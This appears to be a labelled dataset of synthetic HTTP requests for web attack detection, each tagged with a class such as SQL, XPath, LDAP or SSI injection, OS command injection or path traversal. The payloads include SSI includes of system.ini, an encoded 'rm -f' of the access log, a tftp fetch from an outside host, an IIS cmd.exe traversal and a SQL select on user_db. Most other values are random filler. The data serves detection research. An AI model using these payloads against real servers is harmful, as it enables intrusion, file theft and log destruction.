GET /aasanOqaf/h3anTr2h5r/c--UN/2j/qD1RSwu92vbppT7wU3c.swf?e8gd7teeoneu5=i21%40&Enetepsy=avNE&Zeval3jJ3cYAI=4&saabwl=294&-lSnSf=hic&wy3hwhwsttsj6=1esiaic8htis&elt6=%3C%21--%23email+fromhost%3D%22www.etHCrh.com%22+tohost%3D%22mailbox.lat.com%22+message%3D%22psmzy+gabtn8+sreshc2+kte%22+fromaddress%3D%22nstrr.com%22+toaddress%3D%22asoi.eqdh.com%22+subject%3D%22A6y%22+sender%3D%22aac.com%22+replyto%3D%22Rrxve.com%22+cc%3D%22yfyn%22+inreplyto%3D%22snrod+grr+sl6e9%22+id%3D%22lumymail%22+--%3E&JfdrteTsc=39361676&nsseb1kct9iit=ustdin%2BcperloptOhmohsamI%5BTcylT0&syidnsvr=eqti&s65n9rh7hnea=83722&IlIl=ldzte&@tpj=3777 HTTP/1.0
Host: www.ieritr4U.gov
Connection: snrgial
Accept: audio/*
Accept-Charset: *
Accept-Encoding: identity;q=0.4, compress;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 153.213.53.71
Cookie: odgoo=D1tfi;eeEn5xg2eSa=184788;ehr18=5869314189;rle= &Saoheh
Cookie2: $Version="998"
Date: Sun, 09 May 04 20:47:38 UTC
ETag: W/"UfE2ce@UXAHx12IVp"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Mon, 08 Oct 07 12:56:37 CET
If-Unmodified-Since: Wed, 02 Sep 09 11:15:43 UTC
If-Match: "7EHT5aqp_Ma3GG_VDrdm"
If-None-Match: *
If-Range: Sat, 29 May 04 03:58:58 UTC
Max-Forwards: 440
MIME-Version: 5.7
Pragma: tt=d
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: NTLM c2RBb3NidXRhNmFlVHJ3c2Vlc1V4aG1kZGV4cm9Fb2Vxcg==
Range: -7892
Referer: /hsel2ih7/tEf1b1Hn.txt
TE: deflate;q=0.1,gzip,chunked
Trailer: From
User-Agent: isyrcrSCn/8.6
UA-CPU: x86
UA-Disp: 607,126,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9132x248
Via: HTTP/6.0 123.127.180.111
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39333
Start - Id: 35534
class: XPathInjection
PUT /mozrple/r_eur.2Yg71UKaZ37-v.png? HTTP/1.1
Content-Length: 134
Content-Language: niowyhdm,afIm
Content-Encoding: gzip
Content-Location: http://cTTmnIoE.fr/enreo/Sanaag/nprm.zip
Content-MD5: dUF0czVhc21vbmFlaFZjYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Mar 09 04:20:16 UTC
Last-Modified: Mon, 13 Mar 06 06:07:47 UTC
Host: 121.192.232.132
Connection: close
Accept: audio/x-wav;q=0.8, audio/*
Accept-Charset: iso-10646-ucs-2;q=0.0, utf-7;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale=73716
Client-ip: 106.66.65.58
Cookie: oycrtrcgortE=825;inqcltvhltb59=aeHm0XqPdX
Cookie2: $Version="80"
Date: Mon, 25 Jul 05 24:49:13 GMT
ETag: W/"nTFrm6Ac_m@v9GKXfJ4n"
Expect: jeseiyqo=oozs
From: ddsory@ail3hIue.st
If-Modified-Since: Sun, 20 Jan 08 13:06:43 UTC
If-Unmodified-Since: Sat, 20 May 06 19:30:49 GMT
If-Match: "6eCNHQzjAurm-N8pVwI7"
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 8.9
Pragma: sssOa='f'
Proxy-Authorization: Digest nonce
Authorization: Basic dnVhN3M6bnByMmE=
Range: 7-26018,971548-,-1
Referer: http://www.mhS7rupN.fr/fiftye.gif
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: cGtUMOygl http://www.mrl1.it
UA-CPU: 68000
UA-Disp: 740,794,8
UA-Pixels: 502x021
Via: 8.3 164.7.111.234
Transfer-Encoding: identity
Upgrade: hs1gw/0.3, rdt/3.0
Warning: 074 www.hio17hmp.gif "oloAfT" 
X-Forwarded-For: 73.71.14.52
----: -------------

ot=86   or egrA/tds/eys3/child::node()[position()=31]     or    5058=&oatin= x&e7stie=0YRXwhx&TCs7P2=8053085

End - Id: 35534
Start - Id: 48541
class: XPathInjection
PUT /oBs3JaQVe/srcIr/iJGrMCJctYozXOSLr/Dtkefoemsdt6ngranb/eeD/o8YCo-PBA.jpg? HTTP/1.1
Content-Length: 238
Content-Language: d6ei,itiehloo,snehw
Content-Encoding: compress
Content-Location: /zade/pn8rZat.avi
Content-MD5: dHJubWNuaG9nc3dNYWY0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Nov 06 18:09:05 GMT
Last-Modified: Sat, 18 Jul 09 01:47:21 UTC
Host: www.hReok0.biz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: Ns9coxa-d4e;q=0.4
Cache-Control: only-if-cached
Client-ip: 126.205.122.60
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="23"
Date: Fri, 24 Feb 06 16:21:27 CET
ETag: "GcXnmUBFxWJV.V3_q"
Expect: 100-continue
From: 5lotN@aerqwne.st
If-Modified-Since: Thu, 28 Oct 04 19:40:03 CET
If-Unmodified-Since: Wed, 04 Apr 07 19:11:19 CET
If-Match: *
If-None-Match: "UP1Ir5HsSq7x3YVl@X"
If-Range: "SLYfIi-h0qbuBwvE"
Max-Forwards: 6
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: hheeaG dehOfn=ka3m
Authorization: NTLM cmVybnJuc3RkaWE2UGhzZ2llU3VoaG9sZWVhNmF1dWF0amc3b29uUmhlbmV0dTc=
Range: -2,-19392
Referer: /eexnneww/jsewaua/an8emht2/Ttwv/be4s9sk.fgf
TE: deflate;q=0.8,trailers,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 5.5; nT-Na; rv:6.0.4) Gecko/34083340
UA-CPU: StrongARM
UA-Disp: 8426,8051,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 429x1759
Via: 9.3 189.251.16.174, 7.0 52.194.128.111:54646, FTP/1.8 www.0onii.html
Transfer-Encoding: identity
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lofriaot9gdm=eghosqkEeoHe&la=643232065&ee5essxorndcIt=jttaak2hdeK1llr&st4nb=xBoTr7&ttUiaiisbOtnda=8556&ci6qemtV8yltaBG=ttIeogmha&KlikeiE=iAddi'    or    path/child::node()[position()=N]  or     'edysTu'  =  '

End - Id: 48541
Start - Id: 40493
class: SSI
GET /A7uhms/eEOf-W/qc8nK/spee91rU/th8at2rsreheha/Ofcosmwniehlys6m3ff/efhouctrth94ankdl/RmuEdifeaioo8SeL/hoGUOE00RmThfWHITk/w7.swf?epeIhnsyilmasn=%3C%21--++++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&ihDrlspee=57994119&a6tl4=7&Amag=0663509&htneojioR=PlCsfiaxexec&pgnsevq=1651&osnroesnittslg=hvedxxdhmpv2Pczttg&tmssicnhwsuRrv=hRai&tl=i-uNv&on6ozNrzee8r=ir%5Ca4ninnoe3&yegs6o=98221&u6zurKirmslrom=96423 HTTP/1.1
Host: www.dbe2hi56s.st:89
Connection: close
Accept: application/*;q=0.4, audio/*;q=0.4, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: e7reAed=V
Client-ip: 191.31.19.42
Cookie: euler=anWkX;qclea7idbfnA=0809
Cookie2: $Version="05"
Date: Fri, 04 Sep 09 16:30:17 CET
ETag: W/"2I2TG1yCP5g9eFfUR"
Expect: 100-continue
From: 8low4er1@ewrsnfl.uk
If-Modified-Since: Fri, 20 Mar 09 10:51:05 CET
If-Unmodified-Since: Sun, 27 Sep 09 11:05:37 UTC
If-Match: *
If-None-Match: "7SRj@1k@zeufaX..4_"
If-Range: "5pFRSbUL4q6nmWe"
Max-Forwards: 392
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic bDFwbGJlOmljNzk4cQ==
Authorization: taiAai eoeinBmr=ornsr
Range: 74842-61,9795-78
Referer: /9CeteeT.exe
TE: trailers
Trailer: Warning
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 1.6; sr-ee; rv:4.9.7) Gecko/69799526
UA-CPU: x86
UA-Disp: 591,998,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0287x026
Via: 1.6 www.n2Ran5gd.png
Transfer-Encoding: 01nt
Upgrade: eiHn/0.0, mn7n9/4.3, Nko/4.4, wda/1.3, 7itb/8.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 253677
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 40493
Start - Id: 43116
class: OsCommanding
GET /H-_UnDgxsSo/varobaBXhKU.sh?gd8fiixltl4=7909980&hly=s%24%5D+i&sbmduEEe=%250arm++++-f++++%2Fvar%2Flog%2Fhttpd%2Faccess_log++%3B&CsomeTfharepw=and&eYMb4ai=0nSNEMpF.qKr HTTP/1.0
Host: 218.176.52.218:0972
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: euc-tw;q=0.4, hz-gb-2312, iso-8859-8-i;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=281
Client-ip: 139.148.212.233
Cookie: kytrg=sa\$zE2tztg;Bnetcat1V_JeaFH=ae rargoktu5lsystemd>u;eathptoTor=5615656
Cookie2: $Version="389"
Date: Thu, 15 Jan 04 13:06:25 GMT
ETag: W/"g2ZIY_5ttDur@Sre"
Expect: 0tmI
From: 5aEtd@kfeetndtk6.de
If-Modified-Since: Thu, 04 Feb 10 19:34:00 UTC
If-Unmodified-Since: Tue, 08 Jul 08 20:51:15 GMT
If-Match: "ie7SWwMp@BwnrJn0"
If-None-Match: *
If-Range: "0TpZeFNLd1lmCS8-6wEC"
Max-Forwards: 1
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM dHNudGs5YWFpZGVvb2hueTZxbWVocmw4VUlTaXRoZ2F1bmlyVHNIdDlSZlVwaW9l
Authorization: Digest cnonce="sodp"
Range: 94856-,22-022
Referer: http://www.tvdpeun7.net/yiuteebe/tcct/itKoANr6/nH0i.ace
TE: deflate;q=0.4
Trailer: Host
User-Agent: Mozilla/4.8 (Windows; U; Win98 7.6; 7A-eu; rv:1.4.7) Gecko/99569625
UA-CPU: StrongARM
UA-Disp: 046,4473,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 603x2268
Via: 9.7 www.adeE.tiff
Transfer-Encoding: identity
Upgrade: fmge/6.1, 1u3/8.7, hFmfu/1.9
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43116
Start - Id: 40380
class: SSI
GET /U5PB0AuIcJhc@NJ/A-WGE.htm? HTTP/1.0
Host: 142.33.220.7
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-japanese
Accept-Encoding: deflate, deflate;q=0.8, compress
Accept-Language: *;q=0.7
Cache-Control: max-age=9
Cookie: K7hterbwsMr9e03=<!--    #include     virtual="c:\winnt\system.ini"-->
Cookie2: $Version="44"
Date: Sat, 06 Nov 04 08:21:09 UTC
ETag: W/"WU_-78q-@WxIv3dXAb"
Expect: 100-continue
If-Modified-Since: Mon, 26 Dec 05 08:17:51 UTC
If-Match: "O8nEurRO7Qo@sHP8RY"
If-None-Match: *
If-Range: Thu, 01 Jan 09 01:43:09 GMT
Max-Forwards: 3
MIME-Version: 6.0
Referer: /sioEcou.asmx
TE: chunked;q=0.7
User-Agent: ah5heloekm/8.0
UA-Disp: 2628,7679,8
Via: FTP/2.6 www.aa9cuamd.js
Transfer-Encoding: compress
X-Serial-Number: 976386691609
----: ----------------------------------------------

null

End - Id: 40380
Start - Id: 43075
class: OsCommanding
PUT /ipveMI5lssw/nttm/@M-W3r-pOfqvc/oiteitealkoJ/meososSMauoeo/rfgsnemtio/stylenOFPuxASEn3.tiff? HTTP/1.0
Content-Length: 250
Content-Language: r1
Content-Encoding: deflate
Content-MD5: aGhhZW90dG5uMXdob3RuTg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Dec 05 01:59:19 GMT
Host: 70.74.94.172:10352
Connection: hevwhmll
Accept: video/*;q=0.8, video/*
Accept-Charset: *
Accept-Language: w8w-MnasnaT, reib-ei3neBwo, av-ee9sTgx;q=0.7
Cache-Control: max-age=3595
Cookie: Vopeninput-lkK29=6138549;F0u3ifnqe=qewinntDe(a;osaosNttb9l=eiftutrfhno;awto3unals=hexcgttbodyiO
Cookie2: $Version="0"
Date: Thu, 16 Mar 06 11:30:20 CET
If-Modified-Since: Sat, 05 Nov 05 05:24:27 CET
Max-Forwards: 0020
Referer: http://aAlrnr.it/edwpwjs/taud/uidctauC/id1dQm/ehrttg.msf
User-Agent: Mozilla/3.1 (Windows; U; WinNT 0.0; aa-Ap; rv:8.2.1) Gecko/42809517
Via: n3hnt/5.0 214.94.215.46, dbsr/0.9 www.Cdj7beo.shtml:7029, HTTP/9.0 www.eOkiditu.htm
~~~~~: ~~~~~~~~~~~

p8JVcKXscript=c_Jcy@0wmy&uwtsnrtoegrxoat=rcsni&tnrasadmabg=aacee9r&3tg=2837&-GgMsZLhomeUa=llvbscriptrlikeaSirtya&tjmertrh=';   tftp   -c  get   www.isor.com:/leatme.tar&hTtEelemvme=te&GiMnqtop=29&4oa9rpaytlqpl=fs9cilpdbbTfiodfj&Eetep=aefaso

End - Id: 43075
Start - Id: 38424
class: LdapInjection
GET /bssokDyp2hesecs9qa.php3?fonHubbt42e=citido+wdocumenttvasm&oj=t%3F+&yl1eteroat=5wl%29%28%7C%280co%3D*%29&LtpildetEn=6 HTTP/1.0
Host: www.sjrtnU.gov
Connection: 4ie4e0tS
Accept: */*;q=0.6
Accept-Charset: x-mac-arabic, x-mac-icelandic, x-mac-hebrew, cp-936;q=0.1
Accept-Encoding: deflate;q=0.9, identity
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 169.13.143.24
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="88"
Date: Tue, 23 Oct 07 02:57:29 UTC
ETag: W/"Nuh8aaig2MhWGggs"
Expect: 100-continue
From: oe81he@eaf2e.st
If-Modified-Since: Fri, 31 Jul 09 23:37:31 CET
If-Unmodified-Since: Tue, 28 Sep 04 24:07:01 GMT
If-Match: *
If-None-Match: "sWuKOF4L2kMkyX9MK"
If-Range: Thu, 27 Dec 07 13:36:21 UTC
Max-Forwards: 71
MIME-Version: 2.2
Pragma: s='ecco'
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: NTLM Z0Ruc3M4YW9peXlidGVxbmVyMjY5MGhzdHdlRWVvdEFjdHRt
Range: -03,38-
Referer: /ypme/eqsaetr/eose4.jpg
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 2.0; id-sr; rv:4.0.8) Gecko/89548231
UA-CPU: x86
UA-Disp: 185,8388,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: 2.6 1.116.253.158, HTTP/3.8 www.epxaNoh.html:625
Transfer-Encoding: deflate
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38424
Start - Id: 38279
class: LdapInjection
GET /vX/s00byuca/lo/9r1unloezKpE.js?77Ryi0AgXV7=ehcrpeie3i4&veUo=uLKnu_452fg&apt=%29%28++%7C%28na%3D8oeaa*%29&oXnveea=aa HTTP/1.1
Host: www.satt.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.6, gzip, gzip;q=0.1, deflate
Accept-Language: *
Cache-Control: max-age=3564
Client-ip: 227.248.33.223
Cookie: h8n=38
Cookie2: $Version="09"
Date: Sat, 19 Jul 08 13:56:12 UTC
ETag: W/"-Hht-R8UXNeiOEIFFnX"
Expect: ggulohsa
From: v2hr@itzs.com
If-Modified-Since: Fri, 18 May 07 18:16:33 GMT
If-Unmodified-Since: Mon, 23 Oct 06 14:57:08 UTC
If-Match: "5YLzWEbY1zG@z2I"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: foo83 eitO=Eectedv
Range: 339-28315
Referer: /oaj3bnSo.dll
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: dieta/5.5
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: 9.5 www.eAeu.htm, 1.3 www.mR0o.htm
Transfer-Encoding: compress
Upgrade: ndiqn/4.2, cma/1.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 189.204.106.18
X-Serial-Number: 830013506
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38279
Start - Id: 44410
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.maelrao.fr:80
Connection: close
Accept: audio/*;q=0.8, image/*
Accept-Charset: iso-8859-2;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: ltafwiy-Owt, NneAuh-ww;q=0.4, eatexe-wsireul
Cache-Control: bta9m=nx
Client-ip: 136.18.89.145
Cookie: ssbmna=5
Cookie2: $Version="3"
Date: Tue, 10 Jul 07 24:06:03 GMT
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: qeSl8a=erci;preie
From: on76@weg6se.uk
If-Modified-Since: Thu, 12 Mar 09 09:32:12 GMT
If-Unmodified-Since: Sat, 27 May 06 04:28:22 CET
If-Match: *
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: Sat, 26 Mar 05 19:05:28 UTC
Max-Forwards: 4262
MIME-Version: 6.5
Pragma: dml='wra0ir1p'
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: oigi5 uil1eat=nanstcl
Range: 277921-3,-74088
Referer: http://n6Re.cz/ssao5vxt/hacb/t1tsh.js
TE: gzip
Trailer: Warning
User-Agent: Mozilla/1.3 (X11; U; Open BSD i586 9.4; aM-2n; rv:0.1.8) Gecko/85542933
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6396x837
Via: 6.1 125.113.168.19, FTP/3.8 www.HnTdo.jpeg, 8.5 171.237.138.74
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 207.201.80.136
X-Serial-Number: 16197588346334119700
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44410
Start - Id: 49815
class: XPathInjection
GET /u5sUcseaotpalaoeat/olrpeEihdih/-mailpScSIegzLr/wpXWcFF-h./mWQu/C3M/w4Ddeqo4s4ihrssshaw/NIsRaL4st/etdjte3unoHne.mspx?KNG6du0L.qxu=2tAaahavingpasswd%25NsAf+winnt%3FbyKet&e9lbd=7y2sTpi%27+++++or+++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+i+++%2B++++j+%2Bk++%2Bl%2B1%29%5D+%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++%27tah5%27%3D%27++so3sd%27+or&jmetastdinvPG=kot&shmga7=1 HTTP/1.1
Host: www.iohrate.cz:80
Connection: hhrYw
Accept: */*;q=0.5
Accept-Charset: koi8;q=0.6, us-ascii, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 248.234.57.173
Cookie: ubgsoundNt_0qhZ=151;lreecneahtE=n7ld<;u1eag3h=133888;-CDk3=10;hefru=s9crdhEs-tlsunion
Cookie2: $Version="04"
Date: Thu, 22 Dec 05 11:49:37 CET
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: Eyi42tm7@6degzo.st
If-Modified-Since: Wed, 15 Aug 07 18:52:48 CET
If-Unmodified-Since: Mon, 18 Feb 08 01:29:37 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Feb 04 03:20:11 GMT
Max-Forwards: 721
MIME-Version: 3.9
Pragma: es=nEg6ln
Proxy-Authorization: Digest algorithm=H6eFyrt
Authorization: NTLM czJtY21uOXJpczJhaW9obEtFdDZrYXFobk91dEVlcmtybmFlZXRzc3A3dHR5MVM=
Range: -786962,-08955,08-
Referer: http://www.Bxtn.gov/w4epe/xs9e/qtdrINR.bin
TE: trailers
Trailer: Pragma
User-Agent: etevm7ml/9.9.6.2
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: 4.4 234.87.5.77:8664, 0.2 39.228.80.180, 0.8 116.94.125.101
Transfer-Encoding: gzip
Upgrade: oticr3/9.7
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 144.56.170.95
X-Serial-Number: 684744620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49815
Start - Id: 48365
class: XPathInjection
GET /iiwe9iecrEhsoo/Ajaya0/nM/rbrtwgyeoEiSTTae/t1eomdar9iV1s.htm?1BhR0hshutdown12H=Lsr8yandy&eae=8&nrkmfaift=16&srooacrkFu=58&Inacrut=+tdibs&aoboptm7ri=s0GrQ2XpwNK&orBph89cx=i0alrhetNoloee&h2=euMwaobinrAtftpacceptti+&er=alu5aheib3ulesa&enGErahasert=fg3rsltnoeo&ae0eleni=rfctuartw&s8wth5ie=us&a8cwe0zFn5tjru=3uitn HTTP/1.1
Host: www.anhl.st
Connection: keep-alive
Accept: text/*;q=0.7
Accept-Charset: x-mac-hebrew;q=0.6, cp-932;q=0.7, x-mac-icelandic, utf-7;q=0.4
Accept-Encoding: compress, deflate
Accept-Language: *;q=0.7
Cache-Control: E8e='uhs7ad'
Client-ip: 27.47.123.175
Cookie: -80.oU-telnet_M=otNbhzJ;NptnorpHe=aEh;we=jdiv0R
Date: Sat, 08 Nov 08 10:57:58 GMT
ETag: "VFBpNeZpiR1aSD0Mr6T"
Expect: ertOneop
From: s5al6B3@ostl.it
If-Modified-Since: Wed, 09 Nov 05 16:09:45 CET
If-Unmodified-Since: Tue, 20 Oct 09 10:57:22 UTC
If-Match: "lat4Vj7FALxclsVQc"
If-None-Match: *
If-Range: Thu, 20 Jan 05 19:37:54 UTC
Max-Forwards: 65
MIME-Version: 1.1
Pragma: no-cache
Authorization: Basic ZWFpbTpyZXFu
Range: 936421-,-162763,23-835752
Referer: /oHen2/jtrlo/2fi6rb.txt
TE: trailers
Trailer: User-Agent
User-Agent: ecs'     or    path/child::node()[position()=N]    or    'dhoey'=    '
UA-CPU: Sparc
Via: HTTP/5.5 www.Venrlw.tiff, 9.9 199.0.21.224, 5.4 61.157.23.163
Transfer-Encoding: rafv
Upgrade: oYebo/5.6, cRh/6.8
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48365
Start - Id: 35453
class: SqlInjection
PUT /7LdH3p/629oenrdanEhmmc/tx82osVhx/pma0t/l7jrteaO.php3? HTTP/1.0
Content-Length: 60
Content-Language: i,mJaees
Content-Encoding: gzip
Content-Location: /d6si/Oe3el/meptlnfa/tauntt.gif
Content-MD5: bGFqUmlybWF3bk9lZW5ubA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Sep 05 17:29:26 UTC
Last-Modified: Sun, 25 Apr 04 11:51:55 GMT
Host: www.ncmkiteos.com
Connection: close
Accept: text/xml
Accept-Charset: windows-1253, windows-874, x-mac-roman;q=0.6, cp-932;q=0.0, windows-1254;q=0.0
Accept-Encoding: *
Accept-Language: eefepzo-dbi;q=0.5, 77riaime-useSnice, afk6ep-e
Cache-Control: max-age=273
Client-ip: 17.114.30.62
Cookie: rtthdes='     or  id in ( select     *   from      user_db    );TCD3z=262;yvebolHtl=n;OCA-hdp=r )mr'odtmvy6j~iu;taongnuu0=4;xmweteh=a.Be@h530-t
Cookie2: $Version="8"
Date: Sun, 12 Oct 08 07:41:48 GMT
ETag: W/"kAFCpgl.doSj.xaZIyq"
Expect: 100-continue
From: CiEact@jfre.it
If-Modified-Since: Sat, 17 Oct 09 21:34:12 GMT
If-Unmodified-Since: Sat, 21 Jul 07 01:25:04 UTC
If-Match: "Sl5vQNz-SzYB0oH"
If-None-Match: "0RPHD9DpqZGMJPB95V"
If-Range: "ZLTSsVySDA@jiw5B"
Max-Forwards: 5
Pragma: no-cache
Proxy-Authorization: SsfrtN l9Nhbgne=Oxiwaqii
Authorization: Basic NW8waDplZWxnYWFl
Range: 20841-,-28276
Referer: http://www.3a59o1.uk/njassl/lordeclo/i2rhrr/t58Ezne.jsp
TE: deflate,trailers,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.9 (compatible; Konqueror/9.2; Linux i586; yeAid)
UA-Disp: 259,478,16
Via: FTP/8.1 22.13.78.151, 1.9 www.9ietuNgi.jpg, alNipG/1.9 www.gsdl.gif:2
Transfer-Encoding: roona; hnheieu=entaS5is
Warning: 433 142.224.31.47:66 "3t6fta" 
X-Forwarded-For: 142.47.121.158
X-Serial-Number: 8721257248

fbD-r5LXP0N=t&klbHoseh2etpe=ks1efrlo8&emT4FzmRtm=a5servicesy

End - Id: 35453
Start - Id: 36103
class: PathTransversal
GET /ise2/_pswhereolc-MrpR3/m8droppositionGOa.png?ewbl6osyni=5383379&709nse0h9erskai=384693&tseittyseurciTl=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&esfem=mwese%275em%2Bpe%24f2%28&botamo1toru=25&4bqi7uedr=sivwindow.openEta&iieeriHnoaqermh=90arerteshu0Pru&ihomtczawnehuf=eLIq HTTP/1.0
Host: www.Eeokl.ch
Connection: 9asndmlt
Accept: image/*;q=0.9
Accept-Charset: iso-8859-7, x-mac-korean
Accept-Encoding: compress, gzip, compress;q=0.5, compress
Accept-Language: ol-E, 5l-Ewj, ro-enGet, eohmnt-hnTn;q=0.8, tt2nOhxm-nTonnwte;q=0.5
Cache-Control: only-if-cached
Client-ip: 100.85.62.104
Cookie: lpwE7Tj4toYx=f%hssosock_streamlxp_1iihzt;a0tY6ytnyeheeen=aTA2;leud2=m0nthSK9Bc;S5oDM4z=ior ssfaaoha\vcopyl
Cookie2: $Version="1"
Date: Sun, 17 Dec 06 21:45:42 UTC
ETag: W/"END-QoI4eA7dNp1b9"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Thu, 29 Oct 09 17:31:20 UTC
If-Unmodified-Since: Wed, 28 Jul 04 14:09:43 UTC
If-Match: *
If-None-Match: "DMex6@y6MjYiwmNwqB"
If-Range: Mon, 19 Dec 05 23:31:09 CET
Max-Forwards: 8472
MIME-Version: 3.5
Pragma: xs=t
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Basic YXRPaXNhOmV0YWE=
Range: 78-
Referer: /entGtaer/ehmeS7nl.conf
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/7.2 (compatible; MSIE 0.7; Unix; 4e7doen3c; esf0hIw7)
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8256x1298
Via: uted/1.8 129.106.38.238:5227
Transfer-Encoding: deflate
Upgrade: 9tr9iu/0.9
Warning: 505 www.e3nDj.jpeg:48661 "atsjlrarlaaa" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36103
Start - Id: 42737
class: SqlInjection
